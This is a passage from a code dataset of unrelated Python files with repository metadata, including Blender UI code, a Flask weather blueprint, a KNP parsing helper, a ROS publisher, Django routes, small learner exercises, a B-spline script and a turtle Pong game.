row.separator()\n\n row.prop(tp, \"circle_flatten\")\n \n row = box.row(align=True)\n row.prop(tp, \"circle_custom_radius\")\n \n row_right = row.row(align=True)\n row_right.active = tp.circle_custom_radius\n row_right.prop(tp, \"circle_radius\", text=\"\") \n box.prop(tp, \"circle_regular\")\n \n box.separator()\n\n col_move = box.column(align=True)\n row = col_move.row(align=True)\n if tp.circle_lock_x:\n row.prop(tp, \"circle_lock_x\", text = \"X\", icon='LOCKED')\n else:\n row.prop(tp, \"circle_lock_x\", text = \"X\", icon='UNLOCKED')\n if tp.circle_lock_y:\n row.prop(tp, \"circle_lock_y\", text = \"Y\", icon='LOCKED')\n else:\n row.prop(tp, \"circle_lock_y\", text = \"Y\", icon='UNLOCKED')\n if tp.circle_lock_z:\n row.prop(tp, \"circle_lock_z\", text = \"Z\", icon='LOCKED')\n else:\n row.prop(tp, \"circle_lock_z\", text = \"Z\", icon='UNLOCKED')\n col_move.prop(tp, \"circle_influence\")\n\n box.separator() \n box = layout.box().column(1) \n \n\n row = box.row(1) \n # flatten - first line\n split = row.split(percentage=0.15, align=True)\n\n button_align_flatten = icons.get(\"icon_align_flatten\") \n if tp.display_flatten:\n split.prop(tp, \"display_flatten\", text=\"\", icon_value=button_align_flatten.icon_id)\n else:\n split.prop(tp, \"display_flatten\", text=\"\", icon_value=button_align_flatten.icon_id)\n\n split.operator(\"mesh.tp_looptools_flatten\", text=\"LoopTool Flatten\", icon =\"BLANK1\")\n\n # flatten - settings\n if tp.display_flatten:\n box = 
col.box().column(1) \r\n            \r\n            row = box.column(1) \r\n            row.prop(tp, \"flatten_plane\")\r\n\r\n            box.separator()\r\n\r\n            col_move = box.column(align=True)\r\n            row = col_move.row(align=True)\r\n            if tp.flatten_lock_x:\r\n                row.prop(tp, \"flatten_lock_x\", text = \"X\", icon='LOCKED')\r\n            else:\r\n                row.prop(tp, \"flatten_lock_x\", text = \"X\", icon='UNLOCKED')\r\n            if tp.flatten_lock_y:\r\n                row.prop(tp, \"flatten_lock_y\", text = \"Y\", icon='LOCKED')\r\n            else:\r\n                row.prop(tp, \"flatten_lock_y\", text = \"Y\", icon='UNLOCKED')\r\n            if tp.flatten_lock_z:\r\n                row.prop(tp, \"flatten_lock_z\", text = \"Z\", icon='LOCKED')\r\n            else:\r\n                row.prop(tp, \"flatten_lock_z\", text = \"Z\", icon='UNLOCKED')\r\n            col_move.prop(tp, \"flatten_influence\")\r\n\r\n            box.separator() \r\n\r\n        box.separator() \r\n        \r\n        row = box.row(1) \r\n        button_align_planar = icons.get(\"icon_align_planar\") \r\n        row.operator(\"mesh.face_make_planar\", \"Make Planar Faces\", icon_value=button_align_planar.icon_id) \r\n\r\n        box.separator() \r\n\r\n\r\n    ","repo_name":"mkbreuer/ToolPlus","sub_path":"2.79/Sets/toolplus_resurface/ui_layouts/ui_spacing.py","file_name":"ui_spacing.py","file_ext":"py","file_size_in_byte":11518,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"34"} {"seq_id":"45310204643","text":"from sklearn.cluster import SpectralClustering\nimport pandas as pd\nimport networkx as nx\nfrom matplotlib.pylab import show, cm, axis\n\n\nedge_list_df = pd.read_csv(\"work/edgelists/joined/test_0.9.csv\", sep=\"\\t\")\n\nG = nx.from_pandas_edgelist(edge_list_df, \"term1\", \"term2\", edge_attr=True)\nadj_matrix = nx.adjacency_matrix(G, weight=None)\n\nspec_cl = SpectralClustering(\n    3,\n    affinity='precomputed',\n    n_init=100\n)\nspec_cl.fit(adj_matrix)\n\nnx.draw_networkx(\n    G,\n    node_color=spec_cl.labels_,\n    node_size=50,\n    with_labels=True,\n    edge_color=\"silver\",\n    cmap=cm.tab20)\n\naxis(\"off\")\n#plt.savefig(\"work/edgelists/plots/plot.png\")\nshow(block=False)\n","repo_name":"JoelAAs/phenotype_mapping","sub_path":"src/Clustering/SpectralClustering.py","file_name":"SpectralClustering.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"26338078576","text":"import base64\nimport json\nfrom flask import Blueprint, render_template, request, jsonify\nfrom exts import mail\nfrom flask_mail import Message\nimport requests\n\nfrom models import IndoorClimate, OutdoorClimate, WeatherForecast\n\nbp = Blueprint(\"DisInformation\", __name__, url_prefix=\"/\")\nurl = ' http://xxxxxxxx'\nweather_req = 'yourAPIKey'\n\n\nclass Forecast:\n    today = {}\n    tomorrow = {}\n    the_day_after = {}\n\n\n@bp.route(\"/\")\ndef index():\n    indoor_env = IndoorClimate.query.filter_by(id=1).first()\n    # fetch the current weather\n    weather_base_url = weather_req + '&extensions=base'\n    response_base = requests.get(weather_base_url)\n    outdoor_base_msg = {}\n    # check the response status code\n    if response_base.status_code == 200:\n        # parse the JSON data\n        json_base_data = response_base.json()\n        outdoor_base_msg = OutdoorClimate.from_json(json_base_data)\n    else:\n        # request failed; handle the error\n        print('Request failed, response_base status code:', response_base.status_code)\n    # fetch the weather forecast\n    weather_all_url = weather_req + '&extensions=all'\n    response_all = requests.get(weather_all_url)\n    forecast = Forecast()\n    forecasts = [\"\", \"\", \"\"]  # default so the render below works even if the forecast request fails\n    week_num = {'1': '一', '2': '二', '3': '三', '4': '四', '5': '五', '6': '六', '7': '日'}\n    weather_events = {\n        '晴': 'qingtian', '少云': 'shaoyun', '晴间多云': 'duoyunzhuanqing', '多云': 'duoyun', '阴': 'yintian',\n        '有风': 'baitianyoufeng', '平静': 'pingjing', '微风': 'weifeng', '和风':
'weifeng', '清风': 'feng',\n        '强风/劲风': 'qiangfeng', '疾风': 'qiangfeng', '大风': 'dafeng', '烈风': 'liefeng',\n        '风暴': 'liefeng', '狂爆风': 'liefeng', '飓风': 'redaifengbao', '热带风暴': 'redaifengbao',\n        '霾': 'mai', '中度霾': 'mai', '重度霾': 'mai', '严重霾': 'mai', '热': 're', '冷': 'leng',\n        '阵雨': 'zhenyu', '雷阵雨': 'leizhenyu', '雷阵雨并伴有冰雹': 'bingbao',\n        '小雨': 'xiaoyu', '中雨': 'zhongyu', '大雨': 'dayu', '暴雨': 'baoyu', '大暴雨': 'baoyu', '特大暴雨': 'baoyu',\n        '强阵雨': 'qiangzhenyu', '强雷阵雨': 'qiangleizhenyu', '极端降雨': 'jiduanjiangyu', '毛毛雨/细雨': 'xiaoyu',\n        '雨': 'xiaoyu',\n        '小雨-中雨': 'zhongyu', '中雨-大雨': 'dayu', '大雨-暴雨': 'baoyu', '暴雨-大暴雨': 'baoyu',\n        '大暴雨-特大暴雨': 'baoyu',\n        '雨雪天气': 'yujiaxue', '雨夹雪': 'yujiaxue', '阵雨夹雪': 'yujiaxue', '冻雨': 'bingbao',\n        '雪': 'xiaoxue', '阵雪': 'zhenxue', '小雪': 'xiaoxue', '中雪': 'zhongxue', '大雪': 'daxue', '暴雪': 'baoxue',\n        '小雪-中雪': 'zhongxue', '中雪-大雪': 'daxue', '大雪-暴雪': 'baoxue',\n        '浮尘': 'fuchen', '扬沙': 'baitianyangsha', '沙尘暴': 'shachenbao', '强沙尘暴': 'shachenbao_1',\n        '龙卷风': 'longjuanfeng',\n        '雾': 'youwu', '浓雾': 'youwu', '强浓雾': 'youwu', '轻雾': 'youwu', '大雾': 'youwu', '特强浓雾': 'youwu'\n    }\n    # check the response status code\n    if response_all.status_code == 200:\n        # parse the JSON data\n        json_all_data = response_all.json()\n        json_casts = json_all_data.get('forecasts')\n        count = 0\n        original_forecasts = json_casts[0].get('casts')\n        for i in range(len(original_forecasts)):\n            print(i)\n            if i == 3:\n                break\n            forecasts[i] = WeatherForecast.from_json(original_forecasts[i])\n        for cast in json_casts[0].get('casts'):\n            if count == 0:\n                forecast.today = WeatherForecast.from_json(cast)\n                forecast.today.week = week_num[forecast.today.week]\n                count = 1\n            elif count == 1:\n                forecast.tomorrow = WeatherForecast.from_json(cast)\n                forecast.tomorrow.week = week_num[forecast.tomorrow.week]\n                count = 2\n            elif count == 2:\n                forecast.the_day_after = WeatherForecast.from_json(cast)\n                forecast.the_day_after.week = week_num[forecast.the_day_after.week]\n                count = 3\n            else:\n                break\n    else:\n        # request failed; handle the error\n        print('Request failed, response_all status code:', response_all.status_code)\n    # return \"Success\"\n\n    return render_template('index.html', indoor_env=indoor_env,\n                           weather_events=weather_events, outdoor_climate=outdoor_base_msg,\n                           forecasts=forecasts, week_num=week_num)\n\n\n@bp.route(\"/test\", methods=[\"POST\"])\ndef test():\n    try:\n        my_json = request.get_json()\n        print(my_json)\n        get_school = my_json.get(\"school\")\n        get_name = my_json.get(\"name\")\n        get_age = my_json.get(\"age\")\n        mydata = {\"name\": get_name, \"age\": get_age, \"school\": get_school}\n        response = requests.post(url=url, data=json.dumps(mydata))\n        return \"response\"\n    except Exception as e:\n        print(e)\n        return jsonify(msg=\"Wrong\")\n\n\n@bp.route(\"/test1\", methods=['POST'])\ndef the_test():\n    with open(r'uploads/02b054679034407996be23ae2c556688.png', 'rb') as f:\n        res = base64.b64encode(f.read())\n    return res\n\n\n@bp.route(\"/mail/test\")\ndef mail_test():\n    message = Message(subject=\"Mailbox test\", recipients=[\"177574296@qq.com\"], body=\"This is a test email\")\n    mail.send(message)\n    return \"Email sent successfully\"\n\n\n@bp.route(\"/test2\")\ndef bs_test():\n    return render_template('test.html')\n","repo_name":"yinhanlin/smartmirror","sub_path":"blueprints/DisInformation.py","file_name":"DisInformation.py","file_ext":"py","file_size_in_byte":5509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"3809126833","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*- \n\nfrom pyknp import
KNP\n\n\"\"\"\nSave the dependency-parse (KNP) results for the target word and the sentiment words.\n\nin: a sentence containing the target word, the target word, a sentiment dictionary (terms), a sentiment dictionary (nouns)\nout: a dictionary of parse results\n\n\"\"\"\ndef save_bnst(text,keyword,pn_dic): \n\n    bnst_dic ={} \n    keyword_id = 0\n    pn_id = []\n    \n    child_list=[]\n    parent_list=[]\n\n    # 1. Save the parse result (1. parent-id dict, 2. word dict)\n    knp = KNP()\n    result = knp.parse(text)\n    \n    for bnst in result.bnst_list():\n        word = \"\"\n        dic_value ={}\n\n        # 1-1. Join the morphemes into a word and look up the ids of sentiment-polarity words \n        for mrph in bnst.mrph_list():\n            \n            # 1. the target word\n            if mrph.midasi == keyword: \n                keyword_id = bnst.bnst_id\n            # 2. the sentiment dictionaries (terms / nouns)\n            elif mrph.midasi in pn_dic:\n                pn_id.append([bnst.bnst_id,pn_dic[mrph.midasi]])\n            \n            word += mrph.midasi\n\n        # 1-2. add to the dictionary\n        dic_value[\"parent_id\"] = bnst.parent_id\n        dic_value[\"word\"]= word\n        \n        bnst_dic[bnst.bnst_id] = dic_value\n    \n\n    return bnst_dic,keyword_id,pn_id\n\n\"\"\"\nGet the id order of the dependency relations.\n\nin: dictionary of parse results \nout: id order of the dependency relations\n\n\"\"\" \ndef get_bnst_order(bnst_dic):\n\n    bnst_order_dic = {}\n\n    # 1. Get the dependency order (ids) for every bunsetsu\n    for my_id in bnst_dic.keys():\n\n        flag = True\n        my_list=[my_id]\n        serch_id = my_id\n\n        # 1-1. For each bunsetsu, loop until the final head is reached\n        while flag:\n            parent_id = bnst_dic[serch_id][\"parent_id\"]\n\n            if parent_id != -1: # this head is not the last one, so store its id\n                my_list.append(bnst_dic[serch_id][\"parent_id\"])\n                \n            else: # this head is the last one, so leave the loop\n                flag = False\n            \n            serch_id = parent_id # 1-2. use the head's id as the next id to search\n        \n        bnst_order_dic[my_id] = my_list # 1-3. store the dependency order for each bunsetsu\n    \n    return bnst_order_dic\n\n\"\"\"\nGet the ids of the final modifier bunsetsu (those that are not the parent of any other bunsetsu).\n\nin: dictionary of parse results\nout: ids of the final modifier bunsetsu \n\n\"\"\"\ndef get_bnst_end(bnst_dic):\n    \n    end_list = []\n\n    # 1. For each bunsetsu, check whether it is the parent of another bunsetsu\n    for my_id in bnst_dic.keys():\n\n        # 1-1. look for it among the other bunsetsu's parents\n        for value in bnst_dic.values():\n            \n            if my_id == value[\"parent_id\"]: # it is some bunsetsu's parent, so False\n                flag = False\n                break\n            else: # it is no bunsetsu's parent, so True\n                flag = True\n\n        if flag:\n            end_list.append(my_id) # add it to the list\n    \n    return end_list\n\n\"\"\"\nGet the ids to the left of the target word.\n\nin: dictionary of parse results, id order of the dependency relations, target id\nout: ids to the left of the target word (there may be several)\n\n\"\"\"\ndef get_bnst_left(bnst_dic,bnst_order_dic,keyword_id):\n    \n    bnst_left = []\n    end_list = get_bnst_end(bnst_dic)\n\n    # 1. When the target word is on a dependency route, collect the words to its left\n    for i in end_list:\n        serch_list = bnst_order_dic[i]\n\n        # 1-2. check whether the target word is on this dependency route\n        if keyword_id in serch_list:\n            p = serch_list.index(keyword_id) \n            if p != 0:\n                tmp_list = []\n                \n                # 1-3. get the words to the left of the target word\n                for j in range(p):\n                    left_id = serch_list[j]\n                    tmp_list.append(left_id)\n\n                #1-4. store what was found in the list\n                bnst_left.append(tmp_list)\n    \n    return bnst_left\n\n\n\n\"\"\"\nGet the id order to the right of the target word.\n\nin: id order of the dependency relations, target id\nout: ids to the right of the target word (only one route)\n\"\"\"\n\ndef get_bnst_right(bnst_order_dic,keyword_id):\n\n    bnst_right = []\n    # 1. Based on the dependency order, get the words to the right of the target
係り関係順を元に、ターゲットの右側単語を取得\n for right_id in bnst_order_dic[keyword_id]:\n if right_id != keyword_id:\n bnst_right.append(right_id)\n\n return bnst_right\n\n\n \n \n","repo_name":"aharenchie/review_alalysis","sub_path":"run_knp.py","file_name":"run_knp.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42674803701","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import String\nfrom kortex_driver.msg import Base_JointSpeeds, JointSpeed\nimport copy\n\n#trajectory following using joint velocities (not used)\ndef send_vel_commands():\n rospy.init_node('velocity_commander', anonymous=True)\n controller_name = '/my_gen3/in/joint_velocity'\n\n # trajectory_pub = rospy.Publisher(controller_name, FollowJointTrajectoryActionGoal, queue_size = 10)\n trajectory_pub = rospy.Publisher(controller_name, Base_JointSpeeds, queue_size = 10)\n\n jtp_speeds = Base_JointSpeeds()\n jtp_list = []\n print(\"Publishing trajectory execution\")\n\n # jtp_speeds = Base_JointSpeeds()\n while not rospy.is_shutdown():\n for j in range(7):\n jtp_speed = JointSpeed()\n jtp_speed.joint_identifier = j\n jtp_speed.value = 0\n jtp_speed.duration = 1\n jtp_speeds.joint_speeds.append(copy.copy(jtp_speed))\n\n print(jtp_speeds)\n trajectory_pub.publish(jtp_speeds)\n print(\"Executed trajectory\")\n\nif __name__ == '__main__':\n try:\n send_vel_commands()\n except rospy.ROSInterruptException:\n pass","repo_name":"hipsdontlie/ros_kortex","sub_path":"kortex_gazebo/scripts/send_vel_commands_topic.py","file_name":"send_vel_commands_topic.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"5381708818","text":"from django.urls import path, re_path\nfrom . 
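# ---- editor's note: send_vel_commands() above creates jtp_speeds once and
# ---- appends seven JointSpeed entries on every pass of the while loop, so
# ---- the published message grows without bound. A sketch of the fix with
# ---- stand-in classes so it runs without ROS: rebuild the message each cycle.
class _JointSpeed:
    def __init__(self, joint, value, duration=1):
        self.joint_identifier, self.value, self.duration = joint, value, duration

class _BaseJointSpeeds:
    def __init__(self):
        self.joint_speeds = []

def build_speed_msg(values):
    msg = _BaseJointSpeeds()            # fresh message per publish
    for j, v in enumerate(values):
        msg.joint_speeds.append(_JointSpeed(j, v))
    return msg

for _ in range(3):                      # stands in for `while not rospy.is_shutdown():`
    msg = build_speed_msg([0.0] * 7)
    assert len(msg.joint_speeds) == 7   # stays 7, never 14, 21, ...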
import views\nfrom django.views.static import serve\nfrom JinroServer import settings\n\nurlpatterns = [\n path('hall/', views.hall_list),\n path('join/', views.join_game),\n path('start/', views.game_start),\n path(\"readyGame/\",views.ready_game),\n path('uploadIcon/', views.upload_icon),\n path('updateProfile/', views.update_profile),\n path('updateGameSetting/', views.update_game_setting),\n path('exile/', views.exile_player),\n path('doatngiht/', views.do_at_night),\n path(\"rooms/\", views.rooms),\n path(\"login/\", views.login),\n path('joinSakura/', views.join_sakura),\n path('kickPlayer/', views.kick_player),\n re_path(r'^media/(?P.*)$', serve, {'document_root': settings.MEDIA_ROOT}),\n\n]","repo_name":"qianiaoo/JinroServer","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36002016601","text":"'''swajith is having 1 lakh in his bank account in that rate of intrest is 12% per annum in the 5th month swajith is withdrawing\r\nrupees 25,000 in inorder to buy gift for his loved one in the ninth month 10,000 is been deposited in order to give for second\r\nloved one by end of the financial year,does how much swajith having in his bank account?'''\r\ntotal_amount=int(input(\"\"))\r\ni=int(input())\r\nm5=int(input())\r\nm9=int(input())\r\nintrest_upto_5months=(total_amount*4/12*i)/100\r\nintrest_upto_9months=(total_amount-m5*4/12*i)/100\r\nremaining_months=((total_amount-m5+m9)*4/12*i)/100\r\nprint((total_amount-m5+m9)+intrest_upto_5months+intrest_upto_9months+remaining_months)\r\n","repo_name":"sravani123456778/EZ-techinical-trainings","sub_path":"simpleIntrest.py","file_name":"simpleIntrest.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9224207035","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 17 13:55:07 2022\r\n\r\n@author: Dell\r\n\"\"\"\r\n\r\ni = 10\r\nl = []\r\np = []\r\nn = []\r\nodd = []\r\neven = []\r\nDict = {}\r\nwhile i > 1:\r\n num = int(input(\"Enter integer:\"))\r\n l.append(num) # make an original list with user inputted integers\r\n i -= 1\r\nfor j in l:\r\n if j >= 0: # adds to positive integers list\r\n p.append(j)\r\n if j < 0: # adds to negative integers list\r\n n.append(j)\r\n if j % 2 != 0: # adds to odd integers list\r\n odd.append(j)\r\n if j % 2 == 0: # adds to even integers list\r\n even.append(j)\r\n Dict[j] = l.count(j)\r\nprint(\"a) Positive integers:\", p)\r\nprint(\"b) Negative integers:\", n)\r\nprint(\"c) Odd integers:\", odd)\r\nprint(\"d) Even integers:\", even)\r\nprint('e)')\r\nfor k in Dict:\r\n print(f'integer:{k} ; number of times it occurs: {Dict[k]}')","repo_name":"savnijawalkar/assignment-5","sub_path":"untitled8.py","file_name":"untitled8.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15395860715","text":"\n# transform.py\n# ---------------\n# Licensing Information: You are free to use or extend this projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to the University of Illinois at Urbana-Champaign\n#\n# Created by Jongdeog Lee (jlee700@illinois.edu) on 09/12/2018\n\n\"\"\"\nThis file contains the transform function that converts the robot arm 
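# ---- editor's note: simpleIntrest.py above has precedence bugs -- in
# ---- `(total_amount-m5*4/12*i)/100` the `m5*4/12*i` product is evaluated
# ---- before the subtraction, so the principal is never actually reduced.
# ---- A hedged rework under my reading of the word problem (simple interest
# ---- on the running balance, three 4-month segments); the exact month
# ---- boundaries are an assumption the exercise does not state precisely.
def simple_interest(principal, annual_rate_pct, months):
    return principal * (annual_rate_pct / 100) * (months / 12)

balance, rate = 100_000, 12
interest = simple_interest(balance, rate, 4)    # months 1-4 on 1,00,000
balance -= 25_000                               # month-5 withdrawal
interest += simple_interest(balance, rate, 4)   # months 5-8 on 75,000
balance += 10_000                               # month-9 deposit
interest += simple_interest(balance, rate, 4)   # months 9-12 on 85,000
print(balance + interest)                       # 95400.0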
map\nto the maze.\n\"\"\"\nimport copy\nfrom arm import Arm\nfrom maze import Maze\nfrom search import *\nfrom geometry import *\nfrom const import *\nfrom util import *\n\ndef transformToMaze(arm, goals, obstacles, window, granularity):\n \"\"\"This function transforms the given 2D map to the maze in MP1.\n\n Args:\n arm (Arm): arm instance\n goals (list): [(x, y, r)] of goals\n obstacles (list): [(x, y, r)] of obstacles\n window (tuple): (width, height) of the window\n granularity (int): unit of increasing/decreasing degree for angles\n\n Return:\n Maze: the maze instance generated based on input arguments.\n\n \"\"\"\n start_tmp = arm.getArmAngle() #alpha beta\n armLimit = arm.getArmLimit() #[(min,max), (min,max)]\n\n\n\n\n alpha_max = armLimit[0][1]\n alpha_min = armLimit[0][0]\n beta_max = armLimit[1][1]\n beta_min = armLimit[1][0]\n\n num_rows = int((alpha_max - alpha_min)/granularity) + 1\n num_cols = int((beta_max - beta_min)/granularity) + 1\n #print(num_rows, num_cols)\n\n map = []\n col= []\n for x in range(num_rows):\n col=[]\n for y in range(num_cols):\n col.append(SPACE_CHAR)\n map.append(col)\n\n theta_x = alpha_min\n theta_y = beta_min\n offsets = (theta_x,theta_y)\n\n start = angleToIdx(start_tmp,offsets,granularity)\n alpha_start = start[0]\n beta_start = start[1]\n start = idxToAngle(start,offsets,granularity)\n alpha_start = start[0]\n beta_start = start[1]\n\n while theta_x <= alpha_max:\n #print(\"theta_x:\", theta_x)\n while theta_y <= beta_max:\n #print(\"theta_y:\",theta_y)\n armAngle = (theta_x,theta_y)\n arm.setArmAngle(armAngle)\n\n coordinate = angleToIdx(armAngle,offsets,granularity)\n # if (doesArmTipTouchGoals(arm.getEnd(),goals)):\n # print True\n print(coordinate[0]+1,coordinate[1]+1,doesArmTouchObjects(arm.getArmPosDist(), goals, True),doesArmTouchObjects(arm.getArmPosDist(), obstacles, False),doesArmTipTouchGoals(arm.getEnd(),goals))\n\n if theta_x == alpha_start and theta_y == beta_start:\n map[coordinate[0]][coordinate[1]] = START_CHAR\n elif doesArmTouchObjects(arm.getArmPosDist(), obstacles, False) and not doesArmTipTouchGoals(arm.getEnd(),goals):\n map[coordinate[0]][coordinate[1]] = WALL_CHAR\n elif doesArmTouchObjects(arm.getArmPosDist(), goals, True) and doesArmTipTouchGoals(arm.getEnd(),goals):\n map[coordinate[0]][coordinate[1]] = OBJECTIVE_CHAR\n elif not isArmWithinWindow(arm.getArmPos(),window):\n map[coordinate[0]][coordinate[1]] = WALL_CHAR\n # else:\n # map[coordinate[0]][coordinate[1]] = SPACE_CHAR\n theta_y +=granularity\n\n theta_y = beta_min\n theta_x +=granularity\n #print(offsets)\n #print(alpha_start,beta_start)\n #print(\"outof loop\")\n maze = Maze(map,offsets,granularity)\n #print(\"done\")\n return maze\n","repo_name":"skang6283/ECE448","sub_path":"mp2/template/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25753619629","text":"import re\n\n\ndef stack_matches(stack_name, search_keyword, exact_match=False):\n # we don't want to delete any frontend stacks\n if re.match('^fe-', stack_name):\n return False\n\n if exact_match:\n regex = re.escape(search_keyword) + r'$'\n return re.search(regex, stack_name)\n else:\n return search_keyword in stack_name\n\n\ndef search_for_matching_stacks(stack_session, stack_keyword, exact_match=False):\n stacks = []\n\n paginator = stack_session.get_paginator('list_stacks')\n response_iterator = paginator.paginate(StackStatusFilter=['CREATE_COMPLETE'])\n 
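# ---- editor's note: angleToIdx/idxToAngle above come from the course's util
# ---- module; this is my assumed minimal restatement, shown only to make the
# ---- start-angle snapping in transformToMaze checkable standalone. The real
# ---- helpers may round rather than floor.
def angle_to_idx(angles, offsets, granularity):
    return tuple((a - o) // granularity for a, o in zip(angles, offsets))

def idx_to_angle(idx, offsets, granularity):
    return tuple(i * granularity + o for i, o in zip(idx, offsets))

_offsets, _gran = (0, 0), 2                 # (alpha_min, beta_min), step size
_start = (33, 91)                           # raw arm angles
print(idx_to_angle(angle_to_idx(_start, _offsets, _gran), _offsets, _gran))
# (32, 90): the start pose snapped onto the discretized maze grid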
for page in response_iterator:\n stacks.extend(filter(lambda s: stack_matches(s['StackName'], stack_keyword, exact_match), page['StackSummaries']))\n\n return stacks\n","repo_name":"ngroesz/utilities","sub_path":"aws/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21127223000","text":"if __name__ == '__main__':\n mapdict =({})\n nestedlist = []\n i=0\n for _ in range(int(input())):\n name = input()\n score = float(input())\n #nestedlist.append([])\n #nestedlist.append[i].append(score)\n #i+=1\n mapdict.update({name:score})\n\n newlist = list(mapdict)\n print (mapdict)\n print (\"new space ________\")\n print (newlist)\n print (\"new space ________\")\n print (nestedlist)\n\n\nif __name__ == '__main__':\n mapdict =({})\n nestedlist = []\n scorelist = []\n marksheet = []\n for _ in range(int(input())):\n name = input()\n score = float(input())\n #nestedlist.append(name)\n #scorelist.append(score)\n marksheet+=[[name,score]]\n scorelist+=[score]\n #nestedlist.append([])\n #nestedlist.append[i].append(score)\n #i+=1\n #mapdict.update({name:score})\n b = sorted(list(set(scorelist)))[1]\n\n for a,c in sorted(marksheet):\n if c==b:\n print(a)\n #scorelist.append(nestedlist)\n #newlist = list(mapdict)\n #print (mapdict)\n #print (\"new space _____newlist___\")\n #print (newlist)\n #print (\"new space ___nestedlist_____\")\n #print (nestedlist)\n #print (\"new space ___scorelist_____\")\n #print (scorelist)\n #print (\"new space ____marksheet___\")\n #print (marksheet)\n #print (\"what is b? \")\n #print (b)\n #print (\"new space ___scorelist[5]____\")\n #print (scorelist[5])\n #print (\"new space ___scorelist[5][0]____\")\n #print (scorelist1)\n \n\n","repo_name":"swordwielder/python3","sub_path":"hackerrank/nestedlist.py","file_name":"nestedlist.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11744640285","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef mu(x):\n y = np.ones(len(x))\n # Select indices of x such that x[i] < 0.\n si = np.where(x < 0)[0]\n y[si] = 0\n\n return y\n\nlo = -2.5\nhi = +2.5\nn_samples = 101\n\nx = np.linspace(lo, hi, n_samples)\n\ndef beta_0(x):\n b0 = mu(x + 1/2)\n b1 = mu(x - 1/2)\n\n return b0 - b1\n\ndef convolve_and_normalize(x, y):\n z = np.convolve(x, y)\n z = z/np.max(z)\n\n return z\n\ndef add_to_plot(y, m, n):\n l = len(y)\n x = np.linspace(0, l, l) - l//2\n\n left = l//4\n right = l - left\n\n plt.plot(x[left:right], y[left:right], label = rf'$\\beta_{m}^{n}$'.format(m, n))\n\n\nbeta_0_1 = beta_0(x)\nbeta_1_1 = convolve_and_normalize(beta_0_1, beta_0_1)\nbeta_2_1 = convolve_and_normalize(beta_1_1, beta_0_1)\nbeta_3_1 = convolve_and_normalize(beta_2_1, beta_0_1)\n\ndef b_m_0(m):\n x = np.zeros(n_samples)\n left = n_samples//2 - m//2\n right = n_samples//2 + m//2\n\n if m % 2 == 1:\n right = right + 1\n\n for i in range(left, right):\n x[i] = 1\n\n return x\n\nb_2_0 = b_m_0(2)\nb_3_2 = np.convolve(np.convolve(np.convolve(b_2_0, b_2_0), b_2_0), beta_3_1)\nb_3_2 = b_3_2/8\n\n","repo_name":"amey-joshi/am","sub_path":"p3/bspline_filter.py","file_name":"bspline_filter.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25178465355","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball 
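# ---- editor's note: bspline_filter.py above builds B-splines by repeatedly
# ---- convolving the zeroth-order box with itself; a compact restatement
# ---- checking that each convolution keeps the peak normalized to 1, exactly
# ---- what convolve_and_normalize does.
import numpy as np

_x = np.linspace(-2.5, 2.5, 101)
_box = ((_x >= -0.5) & (_x < 0.5)).astype(float)   # beta_0: mu(x+1/2)-mu(x-1/2)

_spline = _box
for _ in range(3):                                 # beta_1, beta_2, beta_3
    _spline = np.convolve(_spline, _box)
    _spline /= _spline.max()                       # renormalize the peak
print(_spline.max(), len(_spline))                 # 1.0, support widens each pass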
import Ball\nfrom score import Score\n\n#------------ SETUP ---------------\nscreen = Screen()\nscreen.setup(width=800, height=600)\nscreen.bgcolor(\"DarkBlue\")\nscreen.title(\"Pong Game\")\nscreen.listen()\nscreen.tracer(0)\ngame_is_on = True\nscore = Score()\n#----------------------------------\n\nleft_paddle = Paddle(-350, 0)\nright_paddle = Paddle(350, 0)\nscreen.tracer(1)\nball = Ball()\n\nscreen.onkey(key=\"w\", fun=left_paddle.up)\nscreen.onkey(key=\"s\", fun=left_paddle.down)\nscreen.onkey(key=\"Up\", fun=right_paddle.up)\nscreen.onkey(key=\"Down\", fun=right_paddle.down)\n\nwhile game_is_on:\n screen.update()\n ball.move()\n \n if ball.ycor() >= 280 or ball.ycor() <= -280:\n ball.bounce()\n if (ball.xcor() > 320 and ball.distance(right_paddle) < 50) or (ball.xcor() < -320 and ball.distance(left_paddle) < 50):\n ball.paddle_hit()\n if ball.xcor() > 380:\n screen.tracer(0)\n ball.reset_pos()\n score.score_up(\"left\")\n if ball.xcor() < -380:\n screen.tracer(0)\n ball.reset_pos()\n score.score_up(\"right\")\n 